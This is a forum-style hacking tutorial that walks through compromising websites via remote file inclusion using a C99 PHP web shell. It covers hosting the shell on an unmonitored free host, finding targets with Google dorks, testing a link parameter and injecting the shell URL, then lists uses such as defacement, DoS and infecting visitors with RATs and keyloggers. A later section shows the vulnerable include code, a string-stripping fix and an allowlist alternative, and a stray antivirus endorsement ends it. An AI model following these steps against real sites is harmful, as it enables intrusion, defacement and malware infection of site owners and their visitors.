Hello. In this mini-tutorial I am going to show you how to use PHP shells such as c99 or other shells to hack/recover your website admin account or deface it, so it's for educational purposes ONLY.
OK, let's start.
Step 1 - Grab yourself a C99 shell from Here.
Step 2 - You need to find a free webhost to host it without deleting your account. I prefer http://www.7host.com since they don't check your accounts.
Step 3 - Register on a free hosting site and upload the C99.php. Of course, if you're a PHP programmer I suggest you password protect that using This Script.
Step 4 - Dorks to type in Google are: here
Also, some pages with certain variables can be vulnerable too, but these are the most common. Such can be like inurl:?buy=car.php
Step 5 - To see if a site is vulnerable you can try this:
Imagine a link is:
http://yoursite.com/?link=http://yoursite.com/web.php
For testing you do:
http://yoursite.com/?link=http://google.com/index.php
If Google's index page also loads in that page then it's vulnerable.
Step 6 - If you find a vulnerable site, what you need to do is replace that link with the C99 shell link you uploaded on your free webhost:
http://yoursite.com/?link=http://you.somefreehost.com/c99.php
And wham! The C99 page is also loaded! You can now:
Upload Files
Delete Files
Move Files
Copy Files
DOS the site
Deface it
Bruteforce FTP password
Lag it
Redirect visitors
Install Drive-By's
Grab Visitor Information and test exploitation on them
Infect Visitors ( RAT - Keylogger - Stealer )
Execute SQL commands
Manage SQL accounts
Execute PHP commands
...
End of Tutorial
OK, now how to prevent RFI on your website or server?
RFI is caused by this:
<?php
$inc = $_GET['link'];
include($inc);
?>
To prevent that we replace strings on the include link:
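<?php
// Take the requested page name from the query string.
$inc = $_GET['link'];
// str_replace() returns the modified string and leaves its input untouched,
// so each result must be assigned back to $inc or the filter does nothing.
$inc = str_replace("http://", "", $inc);
$inc = str_replace("https://", "", $inc);
$inc = str_replace("www.", "", $inc);
$inc = str_replace(".php", "", $inc);
$inc = str_replace(".html", "", $inc);
// Every "." and "/" is stripped by the next two calls, so the later
// patterns that contain a dot no longer have anything left to match.
$inc = str_replace(".", "", $inc);
$inc = str_replace("/", "", $inc);
$inc = str_replace("&", "", $inc);
$inc = str_replace("'", "", $inc);
$inc = str_replace(">", "", $inc);
$inc = str_replace(".com", "", $inc);
$inc = str_replace(".net", "", $inc);
$inc = str_replace(".org", "", $inc);
$inc = str_replace(".info", "", $inc);
$inc = str_replace("etc", "", $inc);
$inc = str_replace("passwd", "", $inc);
$inc = str_replace("..", "", $inc);
$inc = str_replace("...", "", $inc);
// What remains has no scheme, dots or slashes: a bare name in the include path.
include($inc);
?>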
This way, not only will the include page not be vulnerable to RFI, but it will also be protected from many more hacking methods.
Thank you (zer0w0rm)
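An allowlist is a stricter alternative to stripping strings from the `link` parameter: the value is only used as a key into a fixed map of pages, so nothing the visitor sends ever reaches include() directly. This is an added example, not code from the original post; the page names, the pages/ directory and the resolve_page() helper are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical page map: the only files this script may ever include.
// Keys are what the visitor may send in ?link=, values are files on disk.
const PAGES = [
    'home'    => 'home.php',
    'web'     => 'web.php',
    'contact' => 'contact.php',
];

// Assumed layout: page templates live in ./pages next to this script.
const PAGE_DIR = __DIR__ . '/pages';

/**
 * Map the untrusted ?link= value to a file path, or null if not allowed.
 */
function resolve_page(mixed $requested): ?string
{
    // ?link[]=x arrives as an array; anything that is not a string is rejected.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$requested]);
    // realpath() returns false for a missing file; also confirm the resolved
    // path is still inside PAGE_DIR in case a map entry is a symlink.
    if ($base === false || $path === false
        || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

// A URL, a traversal string or any unknown name simply fails the lookup.
$page = resolve_page($_GET['link'] ?? 'home');
if ($page === null) {
    http_response_code(404);
    exit('Page not found');
}
include $page;
```

Independently of the code, leaving `allow_url_include` set to Off in php.ini (its default) stops include() from fetching http:// URLs at all.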
I have been using Kaspersky protection for many years, I would recommend this product to all of you.